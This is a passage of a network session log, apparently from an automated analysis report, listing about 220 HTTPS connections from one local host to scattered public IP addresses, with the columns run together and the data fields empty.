                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17529192.168.2.1445550140.124.239.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17530192.168.2.145518035.174.250.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17531192.168.2.144158068.220.38.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17532192.168.2.1459094158.104.119.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17533192.168.2.1443730101.186.196.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17534192.168.2.1444472181.110.147.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17535192.168.2.144019449.80.104.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17536192.168.2.144129870.149.71.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17537192.168.2.1450394150.214.16.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17538192.168.2.1435574125.16.247.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17539192.168.2.1446422222.142.235.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17540192.168.2.1441000147.41.97.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17541192.168.2.145688834.252.23.65443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17542192.168.2.1439058209.207.217.211443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17543192.168.2.145739053.183.54.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17544192.168.2.1458520107.153.217.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17545192.168.2.1436270136.128.49.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17546192.168.2.143919058.107.97.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17547192.168.2.145734817.79.124.159443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17548192.168.2.1449676223.228.160.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17549192.168.2.144477646.55.190.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17550192.168.2.1443298160.224.14.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17551192.168.2.144396066.134.123.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17552192.168.2.14590581.60.135.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17553192.168.2.146070099.153.238.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17554192.168.2.1458552204.108.251.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17555192.168.2.1438088169.147.102.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17556192.168.2.1443970158.137.66.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17557192.168.2.144887877.167.251.188443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17558192.168.2.14425085.247.124.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17559192.168.2.14513624.248.49.58443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17560192.168.2.143400894.41.252.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17561192.168.2.1454706203.111.239.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17562192.168.2.144716287.81.170.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17563192.168.2.145389482.72.143.27443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17564192.168.2.1459138107.96.179.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17565192.168.2.1442116167.85.114.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17566192.168.2.1442912132.223.236.39443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17567192.168.2.1453140192.51.130.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17568192.168.2.1442146188.50.93.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17569192.168.2.1432830162.191.116.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17570192.168.2.1446122221.243.154.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17571192.168.2.145066036.203.58.164443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17572192.168.2.1440294211.248.9.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17573192.168.2.1445228196.127.114.200443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17574192.168.2.145096251.9.50.62443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17575192.168.2.145388487.183.56.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17576192.168.2.1434470188.166.59.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17577192.168.2.1440598193.202.209.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17578192.168.2.143820685.30.23.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17579192.168.2.1445476144.65.255.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17580192.168.2.1440798222.185.237.157443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17581192.168.2.1445730147.198.175.212443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17582192.168.2.1438708171.118.185.79443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17583192.168.2.1434402195.178.156.176443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17584192.168.2.145041651.146.65.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17585192.168.2.1452200220.122.159.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17586192.168.2.1448394190.224.30.198443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17587192.168.2.1442210182.203.45.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17588192.168.2.1449770112.48.173.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17589192.168.2.1437116137.40.13.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17590192.168.2.1460262213.214.117.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17591192.168.2.144125465.49.206.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17592192.168.2.1437336206.66.26.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17593192.168.2.1457698102.3.239.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17594192.168.2.1440874193.201.141.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17595192.168.2.1443322143.118.241.249443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17596192.168.2.1449914108.18.224.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17597192.168.2.1455562140.122.247.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17598192.168.2.143568437.232.200.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17599192.168.2.144204668.25.189.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17600192.168.2.144951672.116.148.101443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17601192.168.2.1440278130.5.140.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17602192.168.2.144748270.93.130.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17603192.168.2.144716423.74.236.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17604192.168.2.144696227.13.199.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17605192.168.2.1436054194.16.231.9443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17606192.168.2.1447028144.28.24.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17607192.168.2.144167488.204.104.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17608192.168.2.1432846200.150.68.19443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17609192.168.2.1437148138.36.97.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17610192.168.2.144554283.204.241.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17611192.168.2.1456680107.208.218.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17612192.168.2.1439870156.112.86.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17613192.168.2.145611045.24.103.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17614192.168.2.143647478.95.233.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17615192.168.2.145424648.10.199.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17616192.168.2.143669051.222.133.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17617192.168.2.143527670.162.229.103443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17618192.168.2.1447312198.61.75.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17619192.168.2.1460838143.230.45.1443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17620192.168.2.1453390151.188.241.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17621192.168.2.144313066.216.130.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17622192.168.2.143748896.17.60.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17623192.168.2.1451314197.37.46.216443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17624192.168.2.14360508.180.227.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17625192.168.2.145753252.157.49.214443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17626192.168.2.145649476.42.1.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17627192.168.2.1452552144.223.196.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17628192.168.2.1452852162.24.7.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17629192.168.2.1440844210.168.87.251443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17630192.168.2.143634442.169.139.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17631192.168.2.143462027.188.59.99443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17632192.168.2.1447688120.61.88.175443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17633192.168.2.1445176141.140.41.40443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17634192.168.2.145554887.43.144.43443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17635192.168.2.1444626153.28.198.47443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17636192.168.2.143520837.145.51.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17637192.168.2.1458806164.50.185.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17638192.168.2.1433000147.135.117.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17639192.168.2.1444304196.139.122.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17640192.168.2.1446144130.112.229.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17641192.168.2.1440456200.3.236.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17642192.168.2.1450814159.93.76.142443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17643192.168.2.145968841.180.18.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17644192.168.2.1436400120.57.217.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17645192.168.2.1447592102.250.5.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17646192.168.2.1452422213.213.35.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17647192.168.2.1442910191.150.221.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17648192.168.2.145413249.8.232.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17649192.168.2.1452368174.165.224.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17650192.168.2.144020619.42.39.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17651192.168.2.145086659.113.58.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17652192.168.2.144008864.69.178.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17653192.168.2.1454506216.79.124.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17654192.168.2.1454176138.125.39.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17655192.168.2.1456290101.176.50.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17656192.168.2.1447888190.227.160.155443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17657192.168.2.144998467.110.67.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17658192.168.2.143471814.64.61.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17659192.168.2.1435850158.12.181.196443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17660192.168.2.1455520201.86.198.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17661192.168.2.1448320124.95.241.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17662192.168.2.145399266.86.79.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17663192.168.2.1448950151.57.11.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17664192.168.2.1450894167.79.99.190443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17665192.168.2.145339236.117.222.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17666192.168.2.1437902135.244.122.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17667192.168.2.1442864213.39.131.231443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17668192.168.2.1459264176.182.4.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17669192.168.2.1439200170.17.14.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17670192.168.2.145322035.235.83.123443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17671192.168.2.1436478115.52.67.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17672192.168.2.144198479.34.54.161443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17673192.168.2.143953467.169.232.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17674192.168.2.145084641.225.145.206443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17675192.168.2.1448358218.216.68.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17676192.168.2.1457336167.136.247.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17677192.168.2.145660049.246.155.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17678192.168.2.1454148221.217.159.44443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17679192.168.2.1458320212.213.118.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17680192.168.2.143955443.93.13.87443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17681192.168.2.1451450115.40.121.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17682192.168.2.143459652.175.177.193443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17683192.168.2.143447645.190.6.3443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17684192.168.2.1435464121.49.72.173443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17685192.168.2.144933663.194.38.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17686192.168.2.1451858135.81.148.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17687192.168.2.14594229.220.232.254443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17688192.168.2.144543682.206.41.174443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17689192.168.2.144944085.94.81.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17690192.168.2.1434364163.237.210.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17691192.168.2.146056013.151.212.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17692192.168.2.1457624172.170.218.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17693192.168.2.145567090.151.213.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17694192.168.2.1440822218.173.105.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17695192.168.2.145821859.168.147.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17696192.168.2.1443238182.99.103.42443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17697192.168.2.1456504168.179.141.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17698192.168.2.1459266169.213.198.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17699192.168.2.143410045.248.144.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17700192.168.2.1433248193.200.231.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17701192.168.2.145425248.82.204.209443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17702192.168.2.143958080.45.126.83443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17703192.168.2.1446242216.106.138.88443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17704192.168.2.1452460182.99.81.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17705192.168.2.1446388143.240.186.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17706192.168.2.145977032.80.71.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17707192.168.2.1438302171.68.137.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17708192.168.2.1456112174.47.187.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17709192.168.2.14585804.89.89.61443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17710192.168.2.14350801.47.31.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17711192.168.2.1448544130.104.118.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17712192.168.2.144950075.159.79.41443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17713192.168.2.144777425.42.250.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17714192.168.2.143789827.172.216.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17715192.168.2.144572824.210.169.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17716192.168.2.1441902131.195.58.245443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17717192.168.2.1460818105.88.71.165443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17718192.168.2.145401017.68.50.109443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17719192.168.2.146042466.30.118.236443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17720192.168.2.1455822143.93.179.169443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17721192.168.2.1455868218.244.52.247443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17722192.168.2.145144212.94.21.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17723192.168.2.1436204125.73.66.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17724192.168.2.1447924111.42.53.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17725192.168.2.1436932157.68.147.24443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17726192.168.2.1443312185.187.202.11443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17727192.168.2.1449756108.109.169.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17728192.168.2.144611463.44.161.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17729192.168.2.1435090104.188.197.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17730192.168.2.1444540150.146.242.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17731192.168.2.143871879.240.11.54443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17732192.168.2.1441708135.90.234.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17733192.168.2.14474185.180.225.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17734192.168.2.1443724120.178.149.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17735192.168.2.145050639.77.100.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17736192.168.2.1444992137.212.175.52443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17737192.168.2.144619412.180.41.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17738192.168.2.1451572113.7.5.100443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17739192.168.2.1449604146.163.30.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17740192.168.2.1434848109.192.112.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17741192.168.2.1449886104.180.132.210443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17742192.168.2.144073818.194.57.246443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17743192.168.2.1439434182.248.157.144443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17744192.168.2.1447076150.53.56.189443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17745192.168.2.1437676191.169.232.14443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17746192.168.2.1453424113.138.9.56443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17747192.168.2.144064031.124.159.127443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17748192.168.2.1452662119.125.17.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17749192.168.2.1441390125.13.51.80443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17750192.168.2.143620277.42.200.162443
